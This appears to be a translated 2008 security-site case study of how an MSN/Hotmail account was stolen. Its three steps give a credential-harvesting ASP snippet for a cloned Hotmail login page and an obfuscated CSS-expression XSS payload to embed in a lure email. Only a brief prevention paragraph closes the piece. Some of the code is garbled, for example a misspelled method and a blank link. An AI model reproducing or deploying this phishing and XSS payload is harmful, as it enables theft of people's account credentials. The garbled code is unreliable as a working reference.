Case analysis of “cross-site intrusion”: watch out for losing your MSN account

ID MYHACK58:62200820066
Type myhack58
Reporter Anonymous
Modified 2008-08-18T00:00:00


Last time we introduced what cross-site attacks (Cross Site Scripting) are. Today we look at a specific example and describe how to avoid falling victim to cross-site attacks.

“Cross-site intrusion” case reconstruction: hacking an MSN account through cross-site intrusion

Based on clues provided by a user whose MSN account was lost, we reconstruct the case and reason about how the hacker stole his MSN account.

Step 1: The hacker first makes a forged web page that looks the same as the Hotmail login interface. He signs in to the official Hotmail website, clicks “File” in the menu bar, selects “Save As” from the drop-down menu, and saves the page. He then opens the saved page in Dreamweaver or another web editing program (Figure 1), finds the position where the user name and password are entered, and adds this code that steals the user name and password:

[Figure 1]

<% bbsuser =request("bbsuser ") bbspwd =request("bbspwd ") set fs=server. CreateObject("Scripting. FileSystemObject") //Open the file service set file=fs. OpenTaxtFile(server. MapPath("Hotmail.txt"),8,True) //Create the open"Hotmail.txt" file. writeline bbsuser+"----"+ bbspwd //Will receive user name and password write"Hotmail.txt" file. close set file=nothing set fs=nothing %>

Then the local link addresses and the associated parameters in the original Hotmail page are modified so that the pictures display properly, and finally the page is saved as “index.asp” and uploaded to the hacker's own website.

Step 2: With the disguised page ready, the hacker next creates the cross-site Hotmail email. Hackers generally choose a mail program that can edit a message's HTML code directly, such as DreamMail. Start DreamMail and create a new e-mail account that supports POP3.

Then click the “View” > “Switch to the Deluxe version” option in the DreamMail menu bar, create a new blank HTML email in DreamMail, right-click in the message content area, and select “Edit HTML source”. In the HTML source editor window that pops up, enter the following XSS cross-site code:

<font color="ffffff"> <div id="jmp" style="display:none">nop</div> <div id="ly" style="display:none">function ok(){return true};window. onerror=ok</div> <div id="tip" title="<a style="display:none">" style="display:none"></div> <div id="tap" title="<" style="display:none"></div> <div id="tep" title=">" style="display:none"></div> <style>div{background-image:expression(javascript:1? document. write(EC_tip. title+';top:'+EC_tap. title+'/a'+EC_tep. title+EC_tap. title+'script id=nop'+EC_tep. title+EC_ly. innerHTML+EC_tap. title+'/script'+EC_tep. title+EC_tap. title+'script src='+EC_tep. title+EC_tap. title+'/script'+EC_tep. title):1=1);}</style></font>

In this code, the hacker changes the “” link address according to the address of their disguised web page and email. After the message is edited, clicking “OK” completes the cross-site message.

Step 3: The hacker gives this email an attention-grabbing, tempting name and sends it to the victim's MSN mailbox. When the victim views this email in Hotmail, a Hotmail login box pops up to trick the victim into entering the account name and password. If the victim's vigilance is weak, he enters the account name and password on the malicious page. This information is not sent to Microsoft's server but is quietly sent to the hacker (Figure 2).

[Figure 2]

Cross-site prevention plan

To prevent XSS cross-site attacks, ordinary users should, in addition to not clicking on unfamiliar emails and network links, preferably turn off the browser's JavaScript function. In addition, IE's security level can be set to the highest, which can also prevent cookies from being stolen. Site managers producing web pages should take care to filter special characters out of user input, which avoids most XSS attacks. If network managers find that their own site is exposed to cross-site attacks, they must repair the program's cross-site flaw promptly.